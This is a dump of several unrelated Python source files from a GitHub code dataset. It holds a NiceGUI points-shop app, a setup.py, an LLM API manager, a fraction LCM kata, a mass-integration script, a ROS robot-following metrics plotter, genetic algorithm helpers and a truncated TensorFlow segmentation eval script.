ui.button('保存', on_click=lambda: ruleUpdate(ruleText.value, ruleSelect.value))\n            ui.button('关闭', on_click=ruleDialog.close)\n        ruleText = ui.textarea(label='积分规则修改', value=ruleDb.search(User.name == ruleSelect.value)[0]['rule']).classes('w-64 h-48')\nwith ui.row():\n    ui.label('积分规则').classes('text-h5')\n    ui.button('规则修改', on_click=ruleDialog.open)\n## Display the rules\n@ui.refreshable\ndef ruleMark(name):\n    ui.markdown(ruleDb.search(User.name == name)[0]['rule'])\nwith ui.row():\n    with ui.card().classes('w-96 h-32'):\n        with ui.scroll_area():\n            ruleMark('婷婷公主')\n    with ui.card().classes('w-96 h-32'):\n        with ui.scroll_area():\n            ruleMark('笨蛋小魏')\n    with ui.card().classes('w-96 h-32'):\n        with ui.scroll_area():\n            ruleMark('万能愿望卷')\nui.separator()\n\n# Score log\nwith ui.dialog() as dialog, ui.card().classes('w-96 h-96'):\n    logAll = ui.log().classes('w-full h-80')\n    for item in logDb:\n        # show every log entry\n        logAll.push(item['time'][2:-1]+item['event'])\n    ui.button('关闭', 
on_click=dialog.close)\nwith ui.row():\n    ui.label('积分日志').classes('text-h5')\n    ui.button('查看全部日志', on_click=dialog.open)\nlog = ui.log().classes('w-full h-20')\nui.separator()\n\n# Shop\nui.label('商城').classes('text-h5')\n# Resin 4\ndef shopping4():\n    if grid4.options['rowData'][0]['num'] == 0:\n        goods4Dialog.close()\n        ui.notify(\"卖完啦,亲一口小魏补货\")\n        return 0\n    logZtt(-4, 0, \"购买树脂4\")\n    db.update({'num': db.search(User.name == '4')[0]['num'] - 1}, User.name == '4')\n    grid4.options['rowData'][0]['num'] -= 1\n    goods4Dialog.close()\n    grid4.update()\nwith ui.dialog() as goods4Dialog, ui.card():\n    ui.label('是否确定购买?')\n    with ui.row():\n        ui.button('否', on_click=goods4Dialog.close)\n        ui.button('是', on_click=shopping4)\nwith ui.splitter().classes('w-full h-full') as splitter:\n    with splitter.before:\n        with ui.card().classes('w-full h-full'):\n            ui.image('https://s2.loli.net/2023/09/19/PgdEmzL4plAwJjy.jpg')\n    with splitter.after:\n        with ui.card().classes('w-full h-full'):\n            grid4 = ui.aggrid({\n                'defaultColDef': {'flex': 1},\n                'columnDefs': [\n                    {'headerName': '单价', 'field': 'score'},\n                    {'headerName': '数量', 'field': 'num'},\n                ],\n                'rowData': [\n                    {'score': db.search(User.name == '4')[0]['score'], 'num': db.search(User.name == '4')[0]['num']},\n                ],\n            }).classes('w-full h-16')\n            ui.button('购买', on_click=goods4Dialog.open).classes('w-full')\nui.separator()\n\n# Resin 5\ndef shopping5():\n    if grid5.options['rowData'][0]['num'] == 0:\n        goods5Dialog.close()\n        ui.notify(\"卖完啦,亲一口小魏补货\")\n        return 0\n    logZtt(-5, 0, \"购买树脂5\")\n    db.update({'num': db.search(User.name == '5')[0]['num'] - 1}, User.name == '5')\n    grid5.options['rowData'][0]['num'] -= 1\n    goods5Dialog.close()\n    grid5.update()\nwith ui.dialog() as goods5Dialog, ui.card():\n    ui.label('是否确定购买?')\n    with ui.row():\n        ui.button('否', on_click=goods5Dialog.close)\n        ui.button('是', on_click=shopping5)\nwith ui.splitter().classes('w-full h-full') as splitter:\n    with splitter.before:\n        with ui.card().classes('w-full h-full'):\n            ui.image('https://s2.loli.net/2023/09/19/6ADRVUtHJ1C9f2S.jpg')\n    with splitter.after:\n        with ui.card().classes('w-full h-full'):\n            grid5 = ui.aggrid({\n                'defaultColDef': {'flex': 1},\n                'columnDefs': [\n                    {'headerName': '单价', 'field': 'score'},\n                    {'headerName': '数量', 'field': 'num'},\n                ],\n                'rowData': [\n                    {'score': db.search(User.name == '5')[0]['score'], 'num': db.search(User.name == '5')[0]['num']},\n                ],\n            }).classes('w-full h-16')\n            ui.button('购买', on_click=goods5Dialog.open).classes('w-full')\nui.separator()\n\nui.run(title='ZTT LOVE WHY', favicon='💖')","repo_name":"StudentWeis/jifen","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20595619469","text":"import setuptools\n\nwith open('README.md', 'r') as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name=\"fourparts\",\n    version=\"0.0.1\",\n    author=\"rxtan\",\n    description=\"A package related to all things 4 parts\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/ruixuantan/fourparts\",\n    packages=setuptools.find_packages(),\n    install_requires=[\n        'pandas',\n        'py-midicsv',\n        'scikit-learn'\n    ],\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n    
python_requires='>=3.8.0'\n)\n","repo_name":"ruixuantan/FourParts","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27883822082","text":"from memoflow.core import dependency\r\nfrom memoflow.core import manager\r\nfrom memoflow.conf import CONF\r\n\r\nfrom typing import (\r\n Any,\r\n Callable,\r\n Dict,\r\n Iterable,\r\n List,\r\n Optional,\r\n Tuple,\r\n Type,\r\n)\r\n\r\n\r\n@dependency.provider('llm_api')\r\nclass LLMAPIManager(manager.Manager):\r\n driver_namespace = \"memoflow.driver.driver_manager\"\r\n\r\n def __init__(self):\r\n super(LLMAPIManager,\r\n self).__init__(driver_name=CONF.driver_manager.LLM_API_DRIVER)\r\n\r\n def get_embedding(self, text):\r\n return self.driver.get_embedding(text)\r\n\r\n def get_embedding_function(self):\r\n return self.driver.get_embedding_function()\r\n ","repo_name":"qyzhizi/web_dl","sub_path":"memoflow/driver_manager/llm.py","file_name":"llm.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"36093661817","text":"def convertFracts(lst):\n fengmu = []\n sarr = []\n result = []\n for i in lst:\n fengmu.append(i[1])\n\n def gcd(a, b):\n if b == 0:\n return a\n\n return gcd(b, a % b)\n\n def lcm(c, d):\n return c * d / (gcd(c, d))\n\n sarr.append(lcm(fengmu[0], fengmu[1]))\n count = 0\n for i in fengmu[2:]:\n s = lcm(sarr[count], i)\n sarr.append(s)\n count += 1\n LCM = sarr[-1]\n\n def zoomUp(e, f, LCM):\n return [int(LCM / f * e), int(LCM)]\n\n for i in lst:\n result.append(zoomUp(i[0], i[1], LCM))\n return result\n\n\n77033412951888085, 14949283383840498\n'''\nfrom fractions import gcd\n\ndef get_lcm(lst):\n return reduce(lambda x, y : x*y/gcd(x,y), lst)\n\ndef convertFracts(lst):\n lcm = get_lcm([ y for x, y in lst])\n return [ [x*lcm/y, lcm] for x, y in lst]\n \ndef gcd(a,b):\n while b:\n a,b=b,a%b\n return a\ndef lcm(a,b):\n return a*b/gcd(a,b)\n'''\n\n","repo_name":"ecafkoob/Python","sub_path":"CommonDenominators.py","file_name":"CommonDenominators.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24905943745","text":"import math\nimport numpy\nfrom scipy import integrate\nf=open('1dstar.txt',\"r\")\n\ndef Remove(duplicate): \n\tfinal_list = [[], []] \n\tfor i in range(len(duplicate[0])): \n\t\tif duplicate[0][i] not in final_list[0]: \n\t\t\tfinal_list[0].append(duplicate[0][i])\n\t\t\tfinal_list[1].append(duplicate[1][i])\n\treturn final_list \ndef bubbleSort(arr):\n\tn = len(arr[0])\n \n # Traverse through all array elements\n\tfor i in range(n):\n \n # Last i elements are already in place\n\t\tfor j in range(0, n-i-1):\n \n # traverse the array from 0 to n-i-1\n # Swap if the element found is greater\n # than the next element\n\t\t\tif arr[0][j] > arr[0][j+1] :\n\t\t\t\tarr[0][j], arr[0][j+1] = arr[0][j+1], arr[0][j]\n\t\t\t\tarr[1][j], arr[1][j+1] = arr[1][j+1], arr[1][j]\ndef badVolIntegrate(arr):\n\tn = len(arr[0])\n\tresult = 0\n\tprevious_radius= arr[0][0]\n\tprevious_rho=arr[1][0]\n\tfor i in range(1, n):\n\t\tresult += previous_rho * ((4.0/3)*math.pi)*(arr[0][i]**3 - previous_radius**3)\n\t\tprevious_radius = arr[0][i]\n\t\tprevious_rho = arr[1][i]\n\tprint('Mass: ' + str(result))\ndef goodVolIntegrate(arr):\t\n\tn = len(arr[0])\n\tresult = 0\n\tareadens=[]\n\tfor i in 
range(0,len(arr[1])):\n\t\tareadens.append(arr[1][i]*4*math.pi*arr[0][i]**2)\n\tresult=integrate.simps(areadens,arr[0])\n\tprint('Mass: ' + str(result))\nlines=f.readlines()\nresult= [[], []]\nfor x in lines:\n\tresult[0].append(x.split(' ')[1])\n\tresult[1].append(x.split(' ')[2])\ndata = [[], []]\nfor x in range(len(result[0])):\n\tif float(result[0][x]) >= 0:# and float(result[0][x]) <=.87: #and float(result[0][x]) <=1.5:\n\t\tdata[0].append(float(result[0][x]))\n\t\tdata[1].append(float(result[1][x]))\n#print(len(data[0]))\n#print(len(data[1]))\ndata = Remove(data)\n#print(len(data[0]))\n#print(len(data[1]))\nbubbleSort(data)\n#print(len(data[0]))\n#print(data[0])\n#print(\"\\n\")\n#print(data[1])\n#for i in range(len(data[1])):\n#\tif numpy.isclose(data[1][i],0.0007862454):\n#\t\tprint(data[0][i])\ngoodVolIntegrate(data)\n\nf.close()\n","repo_name":"Illinois-Relativity-Group/abid_bot","sub_path":"abid_bot_v2.8/bin/Massinator/test/h5_script_v1.py","file_name":"h5_script_v1.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13304186254","text":"#!/usr/bin/env python\nimport argparse\nimport copy\nimport traceback\n\nfrom os import listdir\nfrom os.path import isfile, join\n\n#from cv_bridge import CvBridge\n\n\nimport math\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nimport random\n# u\nimport numpy as np\nimport cv2 as cv\n\nimport rospy\n# Brings in the SimpleActionClient\nimport actionlib\n# Brings in the .action file and messages used by the move base action\nfrom move_base_msgs.msg import MoveBaseAction, MoveBaseGoal\n\n\nfrom squaternion import quat2euler\nfrom squaternion import euler2quat\n\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import Point\nfrom geometry_msgs.msg import Point32\nfrom geometry_msgs.msg import TransformStamped\nfrom rosgraph_msgs.msg import Clock\n\nfrom costmap_converter.msg import ObstacleArrayMsg\nfrom costmap_converter.msg import ObstacleMsg\nfrom geometry_msgs.msg import Twist\n\n\nimport threading\n\n\nimport _thread\n\nfrom squaternion import quat2euler\nfrom squaternion import euler2quat\n\nfrom simple_pid import PID\n\nimport pickle\nimport utils\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Robot():\n def __init__(self, name):\n self.name = name\n self.prev_call_vicon = None\n self.state_ = {\"position\":(None, None), \\\n \"orientation\":None}\n self.all_states_ = []\n self.last_time_observation = None\n if self.name == \"robot\":\n rospy.Subscriber(\"/vicon/Robot/Robot\", TransformStamped, self.vicon_cb)\n elif self.name == \"person\":\n rospy.Subscriber(\"/vicon/Person/Person\", TransformStamped, self.vicon_cb)\n\n def get_pos(self, idx):\n if \"position\" in self.all_states_[idx].keys():\n pos = self.all_states_[idx][\"position\"]\n else:\n pos = self.all_states_[idx][\"pos\"]\n return pos\n\n def get_orientation(self, idx):\n return self.all_states_[idx][\"orientation\"]\n\n\n def vicon_cb(self, pose_msg):\n if self.last_time_observation is not None and abs(rospy.Time.now().to_sec() - self.last_time_observation) <0.025:\n return\n pos = pose_msg.transform.translation\n self.last_time_observation = rospy.Time.now().to_sec()\n self.state_[\"position\"] = (pos.x, pos.y)\n euler = quat2euler(pose_msg.transform.rotation.x, pose_msg.transform.rotation.y, pose_msg.transform.rotation.z, pose_msg.transform.rotation.w)\n self.state_[\"orientation\"] = euler[0]\n 
self.all_states_.append(self.state_.copy())\n\n    def get_relative_position(self, center, idx):\n        relative_orientation = self.all_states_[idx]['orientation']\n        center_pos = np.asarray(center.get_pos(idx))\n        center_orientation = center.all_states_[idx]['orientation']\n\n        # transform the pos to the center's coordinate frame\n        relative_pos = np.asarray(self.get_pos(idx) - center_pos)\n        rotation_matrix = np.asarray([[np.cos(-center_orientation), np.sin(-center_orientation)], [-np.sin(-center_orientation), np.cos(-center_orientation)]])\n        relative_pos = np.matmul(relative_pos, rotation_matrix)\n\n        return relative_pos\n\n    def get_relative_heading_position(self, center, idx):\n        relative_orientation = self.all_states_[idx]['orientation']\n        center_pos = np.asarray(center.get_pos(idx))\n        center_orientation = center.all_states_[idx]['orientation']\n        print (np.rad2deg(relative_orientation - center_orientation))\n\n        # transform the relative position to the center's coordinate frame\n        relative_pos = np.asarray(self.get_pos(idx) - center_pos)\n        relative_pos2 = np.asarray((relative_pos[0] +math.cos(relative_orientation) , relative_pos[1] + math.sin(relative_orientation)))\n        rotation_matrix = np.asarray([[np.cos(-center_orientation), np.sin(-center_orientation)], [-np.sin(-center_orientation), np.cos(-center_orientation)]])\n        relative_pos = np.matmul(relative_pos, rotation_matrix)\n        relative_pos2 = np.matmul(relative_pos2, rotation_matrix)\n        angle_relative = np.arctan2(relative_pos2[1]-relative_pos[1], relative_pos2[0]-relative_pos[0])\n        return angle_relative, relative_pos\n\n    def is_bag_finish(self):\n        if self.last_time_observation is not None and abs(rospy.Time.now().to_sec() - self.last_time_observation) > 1:\n            return True\n        return False\n\nclass Results():\n    def __init__(self):\n        self.center_pos_ = (0, 0)\n        self.name = \"\"\n        self.DESIRE_DISTANCE = 1.5\n        self.colors_visualization = cv.cvtColor(cv.applyColorMap(np.arange(0, 255, dtype=np.uint8), cv.COLORMAP_WINTER), cv.COLOR_RGB2BGR).reshape(255,3).tolist()\n        self.current_obsevation_image_ = np.zeros([500,500,3])\n        self.current_obsevation_image_.fill(255)\n\n        self.color_index = 0\n        self.first_call_observation = True\n        self.robot = Robot(\"robot\")\n        self.person = Robot(\"person\")\n\n    def add_line_observation_to_image(self, pos, pos2):\n        color = self.colors_visualization[self.color_index]\n        pos_image = utils.to_image_coordinate(pos, self.center_pos_)\n        pos_image2 = utils.to_image_coordinate(pos2, self.center_pos_)\n        if pos_image[0] >self.current_obsevation_image_.shape[0] or pos_image[0] < 0 or pos_image[1] >self.current_obsevation_image_.shape[1] or pos_image[1] < 0:\n            rospy.logerr(\"problem with observation: {}\".format(pos_image))\n            return\n        self.new_obsevation_image_ = cv.line(self.new_obsevation_image_, (pos_image[0], pos_image[1]), (pos_image2[0], pos_image2[1]), color, 1)\n\n    def add_triangle_observation_to_image(self, pos, orientation):\n        color = self.colors_visualization[self.color_index]\n        pos_image = utils.to_image_coordinate(pos, self.center_pos_)\n        pos_triangle1 = utils.to_image_coordinate((pos[0]+math.cos(orientation)*0.3, pos[1]+math.sin(orientation)*0.3), self.center_pos_)\n        pos_triangle2 = utils.to_image_coordinate((pos[0]+math.cos(orientation+math.pi/2)*0.1, pos[1]+math.sin(orientation+math.pi/2)*0.1), self.center_pos_)\n        pos_triangle3 = utils.to_image_coordinate((pos[0]+math.cos(orientation-math.pi/2)*0.1, pos[1]+math.sin(orientation-math.pi/2)*0.1), self.center_pos_)\n        poses = [pos_triangle1, pos_triangle2, pos_triangle3]\n\n        for pos in poses:\n            if pos[0] 
>self.current_obsevation_image_.shape[0] or pos[0] < 0 or pos[1] >self.current_obsevation_image_.shape[1] or pos[1] < 0:\n                rospy.logerr(\"problem with observation: {}\".format(pos))\n                return\n        self.new_obsevation_image_ = cv.drawContours(self.new_obsevation_image_, [np.asarray(poses)], 0, color, -1)\n\n\n    def add_arrow_observation_to_image(self, pos, orientation):\n        color = self.colors_visualization[self.color_index]\n        pos_image = utils.to_image_coordinate(pos, self.center_pos_)\n        pos_image2 = utils.to_image_coordinate((pos[0]+math.cos(orientation)*0.3, pos[1]+math.sin(orientation)*0.3), self.center_pos_)\n        if pos_image[0] >self.current_obsevation_image_.shape[0] or pos_image[0] < 0 or pos_image[1] >self.current_obsevation_image_.shape[1] or pos_image[1] < 0:\n            rospy.logerr(\"problem with observation: {}\".format(pos_image))\n            return\n        self.new_obsevation_image_ = cv.arrowedLine(self.new_obsevation_image_, (pos_image[0], pos_image[1]), (pos_image2[0], pos_image2[1]), color, 2, tipLength=0.5)\n\n    def add_circle_observation_to_image(self, pos, center_pos=None, image=None):\n        color = self.colors_visualization[self.color_index]\n        if image is None:\n            image = self.new_obsevation_image_\n        if center_pos is None:\n            center_pos = self.center_pos_\n        pos_image = utils.to_image_coordinate(pos, center_pos)\n        if pos_image[0] >self.current_obsevation_image_.shape[0] or pos_image[0] < 0 or pos_image[1] >self.current_obsevation_image_.shape[1] or pos_image[1] < 0:\n            rospy.logerr(\"problem with observation: {}\".format(pos_image))\n            return\n        return (cv.circle(image , (pos_image[0], pos_image[1]), 4, color, 2))\n\n\n\n    def update_observation_image(self, idx, len_data):\n        self.new_obsevation_image_ = np.copy(self.current_obsevation_image_)\n        robot_pos = self.robot.get_pos(idx)\n        robot_orientation = self.robot.get_orientation(idx)\n        person_pos = self.person.get_pos(idx)\n        person_orientation = self.person.get_orientation(idx)\n        if person_orientation is None or robot_orientation is None:\n            rospy.logerr(\"person or robot orientation is None\")\n            return\n        if self.first_call_observation:\n            self.first_call_observation = False\n            self.center_pos_ = person_pos\n            #self.add_circle_observation_to_image(robot_pos)\n        self.add_arrow_observation_to_image(robot_pos, robot_orientation)\n        self.add_triangle_observation_to_image(person_pos, person_orientation)\n\n        # self.add_line_observation_to_image(robot_pos, person_pos)\n        alpha = 0.50\n        self.current_obsevation_image_ = cv.addWeighted(self.new_obsevation_image_, alpha, self.current_obsevation_image_, 1 - alpha, 0)\n        self.color_index += 255//len_data\n\n\n    def get_current_observation_image(self):\n\n        image = self.current_obsevation_image_.astype(np.uint8)\n        #image = image/255.\n\n        return image\n\n\n    def get_angle_person_robot(self, idx):\n        pos_rel = self.robot.get_relative_position(self.person, idx)\n        angle_robot_person = math.atan2(pos_rel[1], pos_rel[0])\n        return (utils.wrap_pi_to_pi(angle_robot_person))\n\n    def get_dist_person_robot(self, idx):\n        pos_rel = self.robot.get_relative_position(self.person, idx)\n        return math.hypot(pos_rel[0], pos_rel[1])\n\n    def get_reward(self, idx):\n        reward = 0\n        pos_rel = self.robot.get_relative_position(self.person, idx)\n        angle_robot_person = math.atan2(pos_rel[1], pos_rel[0])\n        angle_robot_person = np.rad2deg(utils.wrap_pi_to_pi(angle_robot_person))\n        distance = math.hypot(pos_rel[0], pos_rel[1])\n        # Negative reward for being behind the person\n        if distance<0.4:\n            reward -= 1\n        if distance < 0.5:\n            reward = -1.3\n        elif abs(distance - 
self.DESIRE_DISTANCE) < 0.5:\n reward += 0.5 * (0.5 - abs(distance - self.DESIRE_DISTANCE))\n elif distance >= self.DESIRE_DISTANCE + 0.5:\n reward -= 0.25 * (distance - self.DESIRE_DISTANCE + 0.5)\n elif distance < self.DESIRE_DISTANCE - 0.5:\n reward -= (self.DESIRE_DISTANCE - 0.5 - distance)/(self.DESIRE_DISTANCE - 0.5)\n if abs(angle_robot_person) < 25:\n reward += 0.5 * (25 - abs(angle_robot_person)) / 25\n else:\n reward -= 0.25 * abs(angle_robot_person) / 180\n if abs(distance - self.DESIRE_DISTANCE) < 0.5 and abs(angle_robot_person) < 25:\n reward += 0.25\n\n reward = min(max(reward, -1), 1)\n return reward\n\n def save(self, name):\n dic_data = {\"name\":name,\"robot\":self.robot.all_states_, \"person\":self.person.all_states_}\n with open (name+\"_.pkl\", \"wb\") as f:\n pickle.dump(dic_data, f)\n\n def load(self, file_address, use_sim=False):\n with open(file_address, \"rb\") as f:\n dic_data = pickle.load(f)\n\n self.name = dic_data[\"name\"]\n self.person.all_states_ = dic_data[\"person\"][4:].copy()\n self.robot.all_states_ = dic_data[\"robot\"][4:].copy()\n if use_sim:\n self.person.all_states_ = [ self.person.all_states_[idx*10] for idx in range (len(self.person.all_states_)//10)]\n self.robot.all_states_ = [ self.robot.all_states_[idx*10] for idx in range (len(self.robot.all_states_)//10)]\n\n def wait_until_bag_finish(self):\n while not self.robot.is_bag_finish() or not self.person.is_bag_finish():\n rospy.sleep(0.1)\n rospy.loginfo(\"waiting for bag to finish\")\n if len(self.person.all_states_)>0 and len(self.robot.all_states_)>0:\n print(self.robot.get_relative_position(self.person, -1))\n print(np.rad2deg(self.get_angle_person_robot(-1)))\n print (self.robot.all_states_)\n print (self.person.all_states_)\n\n def calculate_orientation_dif(self, idx):\n ori_rel, pos_rel = self.robot.get_relative_heading_position(self.person, idx)\n return ori_rel\n\n def get_metrics(self):\n rewards = []\n orientations = []\n orientation_dif = []\n distances = []\n len_data = min(len(self.robot.all_states_), len(self.person.all_states_))\n for idx in range (len_data):\n # if idx % 10==0:\n # self.update_observation_image(idx)\n rewards.append(self.get_reward(idx))\n distances.append(self.get_dist_person_robot(idx))\n orientations.append(self.get_angle_person_robot(idx))\n orientation_dif.append(self.calculate_orientation_dif(idx))\n\n mean_orientation = np.mean(orientations)\n sum_orientations_m = 0\n for orientation in orientations:\n sum_orientations_m += np.power(utils.wrap_pi_to_pi(mean_orientation - orientation),2)\n sum_orientations_m /= len(orientations)\n std = np.sqrt(sum_orientations_m)\n\n\n return {\"name\":self.name, \"orientation_mean\":np.average(orientations), \"orientation_std\":std, \\\n \"reward\":np.sum(rewards), \"distance\":np.average(distances), \"distance_std\":np.std(distances),\\\n \"ori_dif\":np.average(orientation_dif)}\n\n\n def plot_calculate_metrics(self):\n rewards = []\n orientations = []\n distances = []\n len_data = min(len(self.robot.all_states_), len(self.person.all_states_))\n for idx in range (len_data):\n if idx % 3==0:\n self.update_observation_image(idx, len_data//3)\n rewards.append(self.get_reward(idx))\n distances.append(self.get_dist_person_robot(idx))\n orientations.append(self.get_angle_person_robot(idx))\n print (np.rad2deg(self.robot.get_relative_heading_position(self.person, 0)[0]))\n\n img = self.get_current_observation_image()\n img = cv.cvtColor(img, cv.COLOR_RGB2BGR)\n print(f\"\\n\\ndist avg: {np.average(distances)} orientation 
avg: {np.rad2deg(np.average(orientations))}, reward: {np.sum(rewards)} reward avg: {np.average(rewards)}\")\n cv.imshow(\"image\", img)\n cv.waitKey(0)\n\n\n\ndef plot_all_results( results, is_sim=False):\n\n name = []\n orientations = []\n rewards = []\n distances = []\n orientations_std = []\n distances_std = []\n for result in results:\n met = result.get_metrics()\n name.append(met[\"name\"])\n rewards.append(met[\"reward\"])\n distances.append(met[\"distance\"])\n distances_std.append(met[\"distance_std\"])\n orientations.append(np.rad2deg(met[\"orientation_mean\"]))\n orientations_std.append(np.rad2deg(met[\"orientation_std\"]))\n print (f\"{name[-1]}: Distance_avg: {distances[-1]:.2f} Distance_std: {distances_std[-1]:.2f} Orientation_avg: {orientations[-1]:.1f} Orientation_std: {orientations_std[-1]:.1f} reward: {rewards[-1]:.2f} ori_dif: {np.rad2deg(met['ori_dif']):0.2f}\")\n if is_sim:\n print (f\"{name[-1]}: ${distances[-1]:.2f}\\pm{distances_std[-1]:.1f}$ & ${orientations[-1]:.1f}\\pm{orientations_std[-1]:.1f}$ & ${rewards[-1]:.2f}$\")\n else:\n print (f\"{name[-1]}: ${distances[-1]:.2f}\\pm{distances_std[-1]:.1f}$ & ${orientations[-1]:.1f}\\pm{orientations_std[-1]:.1f}$ & ${rewards[-1]:.2f}$\")\n print (\"\\n\")\n\n #df = pd.DataFrame({'name': name, 'assess':[x for x in range(len(name))]})\n\n #plt.errorbar(range(len(df['name'])), orientations, orientations_std, fmt='o')\n #plt.xticks(range(len(df['name'])), df['name'])\n\nif __name__== \"__main__\":\n parser = argparse.ArgumentParser(description='input weight file of the network')\n parser.add_argument('--name', default=\"no_name\", type=str, help='name_traj')\n parser.add_argument('--file-name', default=\"no_name\", type=str, help='name_file_to_load')\n parser.add_argument('--folder-name', default=\"no_name\", type=str, help='name_file_to_load')\n parser.add_argument('--save', action='store_true')\n parser.add_argument('--load-file', action='store_true')\n parser.add_argument('--load-folder', action='store_true')\n parser.add_argument('--plot', action='store_true')\n parser.add_argument('--use-sim-data', action='store_true')\n parser.add_argument('--from-bag', action='store_true')\n args = parser.parse_args()\n\n node = rospy.init_node('plot_results')\n if args.load_folder:\n onlyfiles = [join(args.folder_name, f) for f in listdir(args.folder_name) if isfile(join(args.folder_name, f))]\n onlyfiles.sort()\n\n all_results = []\n for pkl_name in onlyfiles:\n result = Results()\n result.load(pkl_name)\n name_list = result.name.split(\"_\")\n if not args.use_sim_data and name_list[-1] != \"planner\" and name_list[-1] != \"line\":\n print (\"error \")\n continue\n new_name = f\"{name_list[-1]}_{name_list[-2]}_base_line\"\n result.name = new_name\n result.save(new_name)\n\n all_results.append(result)\n plot_all_results(all_results, args.use_sim_data)\n #plt.show()\n\n\n\n\n else:\n result = Results()\n if args.from_bag or args.load_file:\n if args.from_bag:\n result.wait_until_bag_finish()\n else:\n result.load(args.file_name, args.use_sim_data)\n else:\n print(\"exiting you need to load or read from bag file\")\n exit(0)\n\n if args.save:\n result.save(args.name)\n\n if args.plot:\n result.plot_calculate_metrics()\n","repo_name":"payamn/follow_ahead_rl","sub_path":"script/plot_bag.py","file_name":"plot_bag.py","file_ext":"py","file_size_in_byte":16796,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"34351875970","text":"import sys\n\nimport numpy as np\n\n\ndef 
cal_pop_fitness(equation_inputs, pop):\n    # Compute the 'fitness' of each solution in the current population\n    # The 'fitness' function computes the sum of the products between each\n    # input and its corresponding weight\n    return np.sum(pop * equation_inputs, axis=1)\n\n\ndef select_mating_pool(pop, fitness, num_parents):\n    # Select the best individuals in the current generation\n    # to be parents for crossover\n    parents = np.empty((num_parents, pop.shape[1]))\n\n    for parent_num in range(num_parents):\n        max_fitness_idx = np.where(fitness == np.max(fitness))\n        max_fitness_idx = max_fitness_idx[0][0]\n        parents[parent_num, :] = pop[max_fitness_idx, :]\n        fitness[max_fitness_idx] = -sys.maxsize - 1\n\n    return parents\n\n\ndef crossover(parents, offspring_size):\n    offspring = np.empty(offspring_size)\n    # the point at which crossover happens between the two parents\n    # we draw a random number between 1 and the chromosome length\n    crossover_point = np.random.randint(1, offspring_size[1])\n\n    for k in range(offspring_size[0]):\n        # index of the first parent\n        parent1_idx = k % parents.shape[0]\n        # index of the second parent\n        parent2_idx = (k+1) % parents.shape[0]\n        # the new offspring gets the first part of its genes\n        # from the first parent\n        offspring[k, 0:crossover_point] = parents[parent1_idx, 0:crossover_point]\n        # the new offspring gets the second part of its genes\n        # from the second parent\n        offspring[k, crossover_point:] = parents[parent2_idx, crossover_point:]\n\n    return offspring\n\n\ndef mutation(offspring_crossover, mutation_rate=0.3):\n    # mutation changes a single gene in each offspring, at random\n    for idx in range(offspring_crossover.shape[0]):\n        # the mutation only happens within the 'mutation_rate' probability (30% by default)\n        if np.random.random() < mutation_rate:\n            # The random value to be added\n            random_idx = np.random.randint(0, offspring_crossover.shape[1])\n            random_value = np.random.uniform(-1.0, 1.0, 1)\n            offspring_crossover[idx, random_idx] = offspring_crossover[idx, random_idx] + random_value\n\n    return offspring_crossover\n","repo_name":"gregori/genetic_algorithm","sub_path":"ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31994209418","text":"import numpy as np\nimport tensorflow as tf\nfrom data_utils import Dataset_Raw_Provide\nfrom net_main import SegmentationNetwork\nimport time\nimport utils as utils\nfrom initialize import _DATA_PATH, _CHKPT_PATH, _RESULT_PATH, _TINY\nimport os\nimport math\nfrom conv_defs import _CONV_DEFS\n\n'''\nScript to evaluate the network by using raw test data\n'''\n\n# TODO: Confusion matrix, IOU\ndef eval(dir_raw_record,\n         batch_size,\n         num_epochs,\n         data_dims_from_ckpt = None,\n         save_prediction_interval=1,\n         show_last_prediction = True,\n         load_from_chkpt=None,\n         multi_deconv=1,\n         conv_defs=_CONV_DEFS[0],\n         mob_depth_multiplier=1.0,\n         follow_up_convs = 0,\n         sep_convs = False,\n         depthsep_inter_norm_activn = True):\n    '''\n    Evaluate the network from tfRecords.\n    :param dir_raw_record: Directory from which the data is produced\n    :param batch_size: batch size\n    :param num_epochs: number of epochs\n    :param save_prediction_interval: n where per n predictions are saved\n    :param show_last_prediction: true if you want to show the last prediction\n    :param load_from_chkpt: file path for the checkpoint to be loaded\n    :param multi_deconv: Set true to allow multiple layers in deconv network\n    :param mob_f_ep: The mobilenet layer up to which 
the network must be built\n :param mob_depth_multiplier: depth multiplier of mobilenet to reduce the number of parameters\n :return:\n '''\n #dataset = Dataset_Raw_Provide(dir_raw_record,type='test')\n dataset = Dataset_Raw_Provide(dir_raw_record,type='test',val_fraction = 0.1, test_fraction = 0.1)\n data_dim = dataset.data_dim\n print('Data dimension: ', data_dim)\n print('Data dims from chkpt ', data_dims_from_ckpt)\n\n if load_from_chkpt and (not data_dims_from_ckpt == data_dim):\n print('The data dimensions from chkpt and data do not match')\n return\n\n depths = tf.placeholder(dtype=tf.float32, shape=[None, data_dim[0], data_dim[1], 1])\n labels = tf.placeholder(dtype=tf.int32, shape=[None, data_dim[0], data_dim[1]])\n\n model = SegmentationNetwork(depths,\n data_dim,\n is_training=False,\n dropout_keep_prob=1.0,\n multi_deconv=multi_deconv,\n conv_defs=conv_defs,\n mob_depth_multiplier=mob_depth_multiplier,\n follow_up_convs = follow_up_convs,\n sep_convs = sep_convs,\n depthsep_inter_norm_activn= depthsep_inter_norm_activn)\n\n print('deconv_logits shape: ', 